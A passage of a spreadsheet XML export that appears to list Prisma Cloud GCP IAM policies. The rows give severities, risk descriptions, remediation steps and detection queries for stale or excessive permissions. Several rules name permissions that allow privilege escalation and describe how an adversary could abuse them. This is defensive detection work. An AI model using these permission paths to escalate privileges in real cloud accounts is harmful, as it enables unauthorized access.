          <t>c5e8d60e-108c-4383-983e-33b3dd468eff</t>
        </is>
      </c>
      <c r="AJ3265" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3265" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3266">
      <c r="A3266" t="inlineStr"/>
      <c r="B3266" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3266" s="2" t="inlineStr"/>
      <c r="D3266" t="inlineStr"/>
      <c r="E3266" t="inlineStr"/>
      <c r="F3266" t="inlineStr"/>
      <c r="G3266" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3266" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3266" t="inlineStr">
        <is>
          <t>GCP Groups and Service Accounts with IAM Data Read permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3266" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3266" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3266" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3266" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3266" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3266" t="inlineStr"/>
      <c r="R3266" t="inlineStr"/>
      <c r="S3266" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3266" t="b">
        <v>0</v>
      </c>
      <c r="U3266" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3266" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3266" t="inlineStr">
        <is>
          <t>This policy identifies GCP Groups and Service Accounts with Stale IAM Effective Data Read Permissions.
Risk of Unused Data Read Permissions:
Even seemingly innocuous permissions like "Data Read" in GCP IAM can be risky if left unused for extended periods. Unused GCP groups and service accounts with IAM effective Data Read permissions for 90 days present a security concern because:
Information Gathering Tool: An attacker with access to these credentials could use them to gather sensitive details about your GCP environment. This information could include data storage locations (Cloud Storage buckets, BigQuery datasets), project structures, or IAM user details. Attackers could exploit this knowledge to identify vulnerabilities or plan more targeted attacks against your data or other resources.
Potential Stepping Stone: A compromised unused group or service account with Data Read permissions could be a stepping stone for attackers. They might leverage this access to discover and exploit further vulnerabilities within your GCP project, potentially leading to unauthorized access to more sensitive data or systems.
Mitigating the Risk:
Regular Review and Removal: Regularly identify and remove unused GCP groups and service accounts with any level of IAM effective Data Read permissions (Read or Write) on a scheduled basis.
Principle of Least Privilege: Adhere to the principle of least privilege when assigning IAM permissions. Grant only the minimum level of Data Read access required for a group or service account to function effectively. Evaluate if alternative methods, like IAM conditions or service-specific access restrictions, can restrict access to specific data sets or services.
Monitor for Suspicious Activity: Utilize Stackdriver Logging to track activity logs, including access attempts for GCP groups and service accounts. This vigilance can help detect unusual activity related to unused accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3266" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service
 3. Find the binding between the service account/group and the resources that shouldn't have broad access
 4. Remove the binding</t>
        </is>
      </c>
      <c r="Y3266" t="inlineStr"/>
      <c r="Z3266" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and grantedby.cloud.entity.type NOT IN ('user') and action.access.level = 'Data Read' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3266" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3266" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3266" t="inlineStr"/>
      <c r="AD3266" t="b">
        <v>1</v>
      </c>
      <c r="AE3266" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3266" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>802b7d39-6aeb-469c-98b2-f3a24b4af8f1</t>
        </is>
      </c>
      <c r="AI3266" t="inlineStr">
        <is>
          <t>802b7d39-6aeb-469c-98b2-f3a24b4af8f1</t>
        </is>
      </c>
      <c r="AJ3266" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3266" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3267">
      <c r="A3267" t="inlineStr"/>
      <c r="B3267" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3267" s="2" t="inlineStr"/>
      <c r="D3267" t="inlineStr"/>
      <c r="E3267" t="inlineStr"/>
      <c r="F3267" t="inlineStr"/>
      <c r="G3267" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3267" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3267" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Permissions to Edit IAM Policy for Service Accounts Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3267" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3267" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3267" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3267" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3267" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3267" t="inlineStr"/>
      <c r="R3267" t="inlineStr"/>
      <c r="S3267" t="inlineStr"/>
      <c r="T3267" t="b">
        <v>1</v>
      </c>
      <c r="U3267" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3267" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3267" t="inlineStr">
        <is>
          <t>An adversary able to edit Service Accounts' IAM Policies could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3267" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y326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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name = 'iam.serviceAccounts.setIamPolicy'</t>
        </is>
      </c>
      <c r="AA3267" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3267" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3267" t="inlineStr"/>
      <c r="AD3267" t="b">
        <v>1</v>
      </c>
      <c r="AE3267" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3267" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>57a63caf-7e52-4ea8-8323-1a4940b6149b</t>
        </is>
      </c>
      <c r="AI3267" t="inlineStr">
        <is>
          <t>57a63caf-7e52-4ea8-8323-1a4940b6149b</t>
        </is>
      </c>
      <c r="AJ3267" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3267" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3268">
      <c r="A3268" t="inlineStr"/>
      <c r="B3268" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3268" s="2" t="inlineStr"/>
      <c r="D3268" t="inlineStr"/>
      <c r="E3268" t="inlineStr"/>
      <c r="F3268" t="inlineStr"/>
      <c r="G3268" t="b">
        <v>1</v>
      </c>
      <c r="H32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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3268" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3268" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned IAM Role Update Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3268" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3268" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3268" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3268" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3268" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3268" t="inlineStr"/>
      <c r="R3268" t="inlineStr"/>
      <c r="S3268" t="inlineStr"/>
      <c r="T3268" t="b">
        <v>1</v>
      </c>
      <c r="U3268" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3268" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3268" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. With the ability to retrieve and edit IAM roles could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3268" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y326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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name CONTAINS ALL ( 'iam.roles.update', 'iam.roles.get' )</t>
        </is>
      </c>
      <c r="AA3268" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3268" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3268" t="inlineStr"/>
      <c r="AD3268" t="b">
        <v>1</v>
      </c>
      <c r="AE3268" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3268" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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8" t="inlineStr">
        <is>
          <t>a5d57ed3-55b9-4f4b-91ec-fcb6564f76ef</t>
        </is>
      </c>
      <c r="AI3268" t="inlineStr">
        <is>
          <t>a5d57ed3-55b9-4f4b-91ec-fcb6564f76ef</t>
        </is>
      </c>
      <c r="AJ3268" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3268" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3269">
      <c r="A3269" t="inlineStr"/>
      <c r="B3269" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3269" s="2" t="inlineStr"/>
      <c r="D3269" t="inlineStr"/>
      <c r="E3269" t="inlineStr"/>
      <c r="F3269" t="inlineStr"/>
      <c r="G3269" t="b">
        <v>1</v>
      </c>
      <c r="H32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69" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3269" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3269" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Cloud Run IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3269" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3269" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3269" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3269" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3269" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3269" t="inlineStr"/>
      <c r="R3269" t="inlineStr"/>
      <c r="S3269" t="inlineStr"/>
      <c r="T3269" t="b">
        <v>1</v>
      </c>
      <c r="U3269" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3269" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3269" t="inlineStr">
        <is>
          <t>An adversary able to edit the IAM policy for Cloud Run instances,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69" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y326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69" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name CONTAINS ALL ( 'run.services.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3269" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3269" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3269" t="inlineStr"/>
      <c r="AD3269" t="b">
        <v>1</v>
      </c>
      <c r="AE3269" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3269" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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69" t="inlineStr">
        <is>
          <t>a4f27993-81be-43c6-bbe4-28c11ad2db51</t>
        </is>
      </c>
      <c r="AI3269" t="inlineStr">
        <is>
          <t>a4f27993-81be-43c6-bbe4-28c11ad2db51</t>
        </is>
      </c>
      <c r="AJ3269" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3269" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3270">
      <c r="A3270" t="inlineStr"/>
      <c r="B3270" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3270" s="2" t="inlineStr"/>
      <c r="D3270" t="n">
        <v>0</v>
      </c>
      <c r="E3270" t="n">
        <v>0</v>
      </c>
      <c r="F3270" t="n">
        <v>565</v>
      </c>
      <c r="G3270" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3270" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3270" t="inlineStr">
        <is>
          <t>GCP Users and Machine Identities with IAM Data Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3270" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3270" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3270" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3270" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3270" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3270" t="inlineStr"/>
      <c r="R3270" t="inlineStr"/>
      <c r="S3270" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3270" t="b">
        <v>1</v>
      </c>
      <c r="U3270" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3270" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3270" t="inlineStr">
        <is>
          <t>This policy identifies GCP Users with Stale Data Write Permissions.
GCP user accounts or machine identities with Unused "Data Write" permissions, even after 90 days of inactivity, pose a severe security risk:
Unrestricted Data Manipulation: Data Write allows users or machine identities to modify, alter, or even delete critical data stored in GCP services like Cloud Storage buckets or BigQuery datasets. An attacker with these permissions could wreak havoc, corrupting or stealing sensitive information.
Privilege Escalation Pathway: Data Write permissions can be a gateway for further compromise. Attackers might exploit them to gain broader control over your GCP resources and access even more critical data or systems.
Imagine giving someone full access to your company files and then forgetting about it. Unused Data Write access is just as dangerous. Here's how to mitigate the risk:
Ruthless Review: Aggressively identify and disable all unused GCP user accounts and machine identities with Data Write permissions, regardless of how long they've been inactive.
Least Privilege Principle: Grant Data Write permissions only to specific users or machine identities that absolutely require them, and only for the minimum time necessary. Utilize IAM policies for granular control.
Mandatory MFA: Enforce Multi-Factor Authentication (MFA) for all users and service accounts with Data Write permissions. This significantly reduces the risk of unauthorized access, even if credentials are compromised.</t>
        </is>
      </c>
      <c r="X3270"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7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0" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and action.access.level = 'Data Write' and action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3270" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3270" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3270" t="inlineStr"/>
      <c r="AD3270" t="b">
        <v>1</v>
      </c>
      <c r="AE3270" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3270" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>8bce234c-c022-459a-9041-aedf509213f5</t>
        </is>
      </c>
      <c r="AI3270" t="inlineStr">
        <is>
          <t>8bce234c-c022-459a-9041-aedf509213f5</t>
        </is>
      </c>
      <c r="AJ3270" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3270" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3271">
      <c r="A3271" t="inlineStr"/>
      <c r="B3271" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3271" s="2" t="inlineStr"/>
      <c r="D3271" t="inlineStr"/>
      <c r="E3271" t="inlineStr"/>
      <c r="F3271" t="inlineStr"/>
      <c r="G3271" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3271" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3271" t="inlineStr">
        <is>
          <t>GCP VM instance with write permissions on deny policies</t>
        </is>
      </c>
      <c r="L3271" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3271" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3271" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3271" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3271" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3271" t="inlineStr"/>
      <c r="R3271" t="inlineStr"/>
      <c r="S3271" t="inlineStr"/>
      <c r="T3271" t="b">
        <v>1</v>
      </c>
      <c r="U3271" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3271" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3271" t="inlineStr">
        <is>
          <t>With access to 'iam.denypolicies.delete', 'iam.denypolicies.update' permissions an adversary can destroy the access of the identities inside of the organizational environemnt, making irreversible damage to your organization</t>
        </is>
      </c>
      <c r="X3271"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7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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.type = 'GCP' AND source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' AND action.name IN ('iam.denypolicies.delete', 'iam.denypolicies.update')</t>
        </is>
      </c>
      <c r="AA3271" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3271" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3271" t="inlineStr"/>
      <c r="AD3271" t="b">
        <v>1</v>
      </c>
      <c r="AE3271" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3271" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>aa9937b2-3d5f-4967-9404-27b050794dbf</t>
        </is>
      </c>
      <c r="AI3271" t="inlineStr">
        <is>
          <t>aa9937b2-3d5f-4967-9404-27b050794dbf</t>
        </is>
      </c>
      <c r="AJ3271" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3271" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3272">
      <c r="A3272" t="inlineStr"/>
      <c r="B3272" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3272" s="2" t="inlineStr"/>
      <c r="D3272" t="n">
        <v>0</v>
      </c>
      <c r="E3272" t="n">
        <v>18</v>
      </c>
      <c r="F3272" t="n">
        <v>0</v>
      </c>
      <c r="G3272" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3272" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3272" t="inlineStr">
        <is>
          <t>GCP Cloud Run with basic role</t>
        </is>
      </c>
      <c r="L3272" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3272" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3272" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3272" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3272" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3272" t="inlineStr"/>
      <c r="R3272" t="inlineStr"/>
      <c r="S3272" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3272" t="b">
        <v>1</v>
      </c>
      <c r="U3272" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3272" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3272" t="inlineStr">
        <is>
          <t>Identifies Cloud Run instances granted broad access due to highly permissive basic roles attached ('Viewer', 'Editor', 'Owner'). When not otherwise configured, compute instances will use the default compute service account which, given default GCP configurations, is granted the 'Editor' role.</t>
        </is>
      </c>
      <c r="X3272" t="inlineStr">
        <is>
          <t>Remediation steps:
1.Log in to your GCP instance.
2.Navigate to the Cloud Run instance, Revisions tab, Security.
3.Copy the Service account name, and navigate to IAM.
4.Under the IAM tab, search for the Service account, and click on the pencil icon to edit it's permissions.</t>
        </is>
      </c>
      <c r="Y327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2" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND grantedby.cloud.policy.name IN ( 'Viewer', 'Editor', 'Owner' )</t>
        </is>
      </c>
      <c r="AA3272" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3272" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:45</t>
        </is>
      </c>
      <c r="AC3272" t="inlineStr"/>
      <c r="AD3272" t="b">
        <v>1</v>
      </c>
      <c r="AE3272" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3272" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>0c1f97f6-8740-4561-bae7-d9216fb5e4a0</t>
        </is>
      </c>
      <c r="AI3272" t="inlineStr">
        <is>
          <t>0c1f97f6-8740-4561-bae7-d9216fb5e4a0</t>
        </is>
      </c>
      <c r="AJ3272" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3272" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3273">
      <c r="A3273" t="inlineStr"/>
      <c r="B3273" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3273" s="2" t="inlineStr"/>
      <c r="D3273" t="inlineStr"/>
      <c r="E3273" t="inlineStr"/>
      <c r="F3273" t="inlineStr"/>
      <c r="G3273" t="b">
        <v>1</v>
      </c>
      <c r="H32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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3273" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3273" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Permissions to Edit IAM Policy for Service Accounts Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3273" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3273" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3273" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3273" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3273" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3273" t="inlineStr"/>
      <c r="R3273" t="inlineStr"/>
      <c r="S3273" t="inlineStr"/>
      <c r="T3273" t="b">
        <v>1</v>
      </c>
      <c r="U3273" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3273" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3273" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. With the ability to edit Service Accounts' IAM Policies they could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3273" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y327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3" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name = 'iam.serviceAccounts.setIamPolicy'</t>
        </is>
      </c>
      <c r="AA3273" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3273" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3273" t="inlineStr"/>
      <c r="AD3273" t="b">
        <v>1</v>
      </c>
      <c r="AE3273" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3273" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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3" t="inlineStr">
        <is>
          <t>568c9eb2-3f77-4cbd-93c4-955fc869265b</t>
        </is>
      </c>
      <c r="AI3273" t="inlineStr">
        <is>
          <t>568c9eb2-3f77-4cbd-93c4-955fc869265b</t>
        </is>
      </c>
      <c r="AJ3273" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3273" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3274">
      <c r="A3274" t="inlineStr"/>
      <c r="B3274" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3274" s="2" t="inlineStr"/>
      <c r="D3274" t="n">
        <v>0</v>
      </c>
      <c r="E3274" t="n">
        <v>0</v>
      </c>
      <c r="F3274" t="n">
        <v>597</v>
      </c>
      <c r="G3274" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3274" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3274" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Cloud Run Creation Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3274" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3274" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3274" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3274" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3274" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3274" t="inlineStr"/>
      <c r="R3274" t="inlineStr"/>
      <c r="S3274" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3274" t="b">
        <v>1</v>
      </c>
      <c r="U3274" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3274" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3274" t="inlineStr">
        <is>
          <t>An adversary able to create Cloud Run instances with Service Account impersonation privileges would be able to escalate their permissions creating an instance which performs attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3274" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y327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4" t="inlineStr">
        <is>
